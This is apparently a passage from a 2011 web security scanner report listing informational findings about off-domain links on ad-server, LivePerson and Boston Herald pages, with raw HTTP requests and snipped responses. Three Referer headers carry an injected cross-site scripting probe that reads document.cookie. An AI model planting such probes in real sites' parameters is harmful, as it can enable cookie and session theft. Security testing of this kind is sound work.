document.write ('<A HREF="http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=874556783?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=874556783?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.143. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:37:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3321
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/374200294/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=374200294?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/374200294/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=374200294?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/374200294/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=374200294?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=374200294?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.144. https://base.liveperson.net/hc/5296924/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386 HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; HumanClickCHATKEY=3761611791040242971; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:06:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Content-Type: text/html
Last-Modified: Fri, 28 Jan 2011 14:06:44 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 43173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">
<head>

...[SNIP]...
<![endif]-->

<script type="text/javascript" src="//liveperson-partners.s3.amazonaws.com/shared/js/mbox.js"></script>
...[SNIP]...
</table>

<script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
<!-- Business.com Conversion Tracking Code for "Business.com Conversion Tracking" -->
<script language="JavaScript" src="https://roi.business.com/crm/js/conversion.js"></script>
...[SNIP]...

17.145. http://bh.heraldinteractive.com/includes/processAds.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7231934c67
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:34 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1861
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle"></script>
...[SNIP]...
<noscript>
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle?x"><IMG
SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle?x" BORDER="0">
</a>
...[SNIP]...

17.146. http://bh.heraldinteractive.com/includes/processAds.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7231934c67
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:34 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1860
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom"></script>
...[SNIP]...
<noscript>
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom?x"><IMG
SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom?x" BORDER="0">
</a>
...[SNIP]...

17.147. http://bh.heraldinteractive.com/includes/processAds.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1848
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top"></script>
...[SNIP]...
<noscript>
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top?x"><IMG
SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top?x" BORDER="0">
</a>
...[SNIP]...

17.148. http://bh.heraldinteractive.com/includes/processAds.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1867
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle"></script>
...[SNIP]...
<noscript>
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle?x"><IMG
SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle?x" BORDER="0">
</a>
...[SNIP]...

17.149. http://bh.heraldinteractive.com/includes/processAds.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7231934c67
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:11 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1842
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Top"></script>
...[SNIP]...
<noscript>
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Top?x"><IMG
SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Top?x" BORDER="0">
</a>
...[SNIP]...

17.150. http://boston30.autochooser.com/results.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boston30.autochooser.com
Path:   /results.asp

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp HTTP/1.1
Host: boston30.autochooser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI"
Content-Type: text/html
Expires: Fri, 28 Jan 2011 05:20:30 GMT
Set-Cookie: cid=4473401; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSSQCBSCQ=ILBLDIICKPOMNHFEBBFBBIPG; path=/
Cache-control: private
Content-Length: 74164


<HTML>
<HEAD>
<TITLE>Quick Search</TITLE>
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<script language="JavaScript">
<!--

   function saveFavorites() {
       if (document.results) {
           document.resu
...[SNIP]...
</SCRIPT>

<link rel=stylesheet type="text/css" href="http://www.carfind.com/navigation/style.css">


<script src="http://www.bostonherald.com/navigation/hiasysMJX.js" LANGUAGE="JavaScript1.1" TYPE="text/javascript"></script>
...[SNIP]...
</style>
<script src="http://www.homefind.com/include/bgNavEng2.js" language="JavaScript1.1" type="text/javascript" ></script>
...[SNIP]...
<td><a href=http://www.carfind.com><img border="0" src="http://www.carfind.com/images/top1.gif" width="269" height="77"></a>
...[SNIP]...
<td colspan="2" bgcolor="#996633"><img border="0" src="http://www.carfind.com/images/top2.gif" width="269" height="19"></td></tr><tr>
<td colspan="2" bgcolor="#FFFFFF"><img border="0" src="http://www.carfind.com/images/top3.gif" width="268" height="1"></td>
...[SNIP]...
<td width="48"><img border="0" src="http://www.carfind.com/images/top4.gif" width="48" height="20"></td>
...[SNIP]...
<td class=whiteCell width=1><img src=http://www.bostonherald.com/images/1x1.gif width="1" height="1"></td>
...[SNIP]...
<td align=center bgcolor="#EA8C00" onMouseOver="mOverNav(this,'sell a car','ho')" onMouseOut="mOutNav(this,'','ho')"><a href=http://www.carfind.com/sellCar.bg target=_top><font class=button2font color=#FFFFFF>
...[SNIP]...
<td align=center bgcolor="#EA8C00" onMouseOver="mOverNav(this,'other','hf')" onMouseOut="mOutNav(this,'','so')"><a href=http://www.carfind.com/searchOther.bg target=_top><font class=button2font color=#FFFFFF>
...[SNIP]...
<td align=center bgcolor="#EA8C00" onMouseOver="mOverNav(this,'news & reviews','hf')" onMouseOut="mOutNav(this,'','sr')"><a href=http://www.carfind.com/news/ target=_top><font class=button2font color=#FFFFFF>
...[SNIP]...
<td align=center bgcolor="#EA8C00" onMouseOver="mOverNav(this,'dealer specials','hf')" onMouseOut="mOutNav(this,'','sr')"><a href=http://www.carfind.com/dealerSpecials/ target=_top><font class=button2font color=#FFFFFF>
...[SNIP]...
<td align=center bgcolor="#C5AF7D" onMouseOver="mOverNav2(this,'for dealers','hf')" onMouseOut="mOutNav2(this,'','sk')"><a href=http://www.carfind.com/dealerSearch/dealerRequest.bg target=_top><font class=button2font color=#FFFFFF>
...[SNIP]...
<br>
<a href=http://www.carfind.com/dealerSpecials/><img src=http://www.carfind.com/images/gas120x120.gif border=0></a>
...[SNIP]...
<b><a href=http://www.carfind.com/dealerSearch/dealerRequest.bg><font color=#CC6600>
...[SNIP]...
</font><a href="http://www.carfind.com/"><font color="#CC6600">
...[SNIP]...
</font><a href="http://www.carfind.com/sellCar.bg"><font color="#CC6600">
...[SNIP]...
</font><a href="http://www.carfind.com"><font color="#CC6600">
...[SNIP]...
</font><a href="http://www.jobfind.com" target="_new"><font color="#CC6600">
...[SNIP]...
</font><a href="http://www.homefind.com"><font color="#CC6600">
...[SNIP]...
<font class="storyFont"><a href="http://www.hiasys.com" target="_blank"><font color="#c0c0c0">
...[SNIP]...
<font class="storyFont"><a href="http://www.hiasys.com/pc.html"><font color="#c0c0c0">
...[SNIP]...
</table>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.151. http://bostonherald.com/blogs/entertainment/the_assistant/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /blogs/entertainment/the_assistant/

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /blogs/entertainment/the_assistant/?p=3065 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/entertainment/the_assistant/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<meta name="SUBSECTION" content="Blogs" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/tabbed.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/index.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/dropdown.css" media="screen,projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/subnavigation.css" media="screen,projection" />
   
   <link rel="stylesheet" type="text/css" href="/CSS/blogs.css" media="screen,projection" />
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<a href="/blogs/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/blogs/logoInsideBlogs.gif" alt="Blogs" /></a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.carfind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind" />Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.homefind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind" />Homefind</a>
...[SNIP]...
<a class="displayBlock" href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind" />Jobfind</a>
...[SNIP]...
<a href="/blogs/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
News &amp; Business Blogs</a>
...[SNIP]...
<a href="/blogs/sports/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Sports Blogs</a>
...[SNIP]...
<a href="/blogs/entertainment/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Entertainment Blogs</a>
...[SNIP]...
<a href="/blogs/lifestyle/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />
Lifestyle Blogs</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<p><a href="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg"><img class="aligncenter" src="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg" alt="" width="500" height="431" /></a>
...[SNIP]...
<p><a href="http://models.com/oftheminute/archives/images/Lydia-Hearst.jpg"><img class="aligncenter" src="http://models.com/oftheminute/archives/images/Lydia-Hearst.jpg" alt="" width="350" height="456" /></a></p>
<p>Jeff is know for liking the young ladies, as the UK&#8217;s Daily Mail <a href="http://www.dailymail.co.uk/tvshowbiz/article-1350862/Jeff-Goldblum-shares-kisses-model-heiress-Lydia-Hearst-Shaw.html" target="_blank">points out</a>
...[SNIP]...
<p><iframe title="YouTube video player" class="youtube-player" type="text/html" width="480" height="390" src="http://www.youtube.com/embed/9ZHh9ckRC6M" frameborder="0" allowFullScreen></iframe>
...[SNIP]...
corner booth of some fancy restaurant and drinks straight tequila and pretends to be Ernest Hemingway? Oh, well when searching for the article, I just discovered that Daily Intel says she didn&#8217;t <a href="http://nymag.com/daily/intel/2008/10/page_six_busts_lyin_lydia_hear.html" target="_blank">write it at all</a>. Whatever. I&#8217;m more concerned with the fact that you&#8217;re doing a 60 year old. AND that she&#8217;s the daughter of the queen of kidnapped heiresses turned vigilante bank robbers,<a href="http://en.wikipedia.org/wiki/Patty_Hearst" target="_blank"> Patty Hearst</a>
...[SNIP]...
<p><iframe title="YouTube video player" class="youtube-player" type="text/html" width="480" height="390" src="http://www.youtube.com/embed/eEsZ23aZEK4" frameborder="0" allowFullScreen></iframe>
...[SNIP]...
<font class=bodyFont color=#333333>


<img src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg?sdf=sdfs" style="float:left">

       
<strong>
...[SNIP]...
<a href=http://bostonherald.com/blogs/entertainment/the_assistant/?feed=rss2><img src=http://cache.heraldinteractive.com/siteImages/icons/xml_sm.gif border=0></a>
...[SNIP]...

17.152. http://bostonherald.com/blogs/lifestyle/fork_lift/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /blogs/lifestyle/fork_lift/

Issue detail

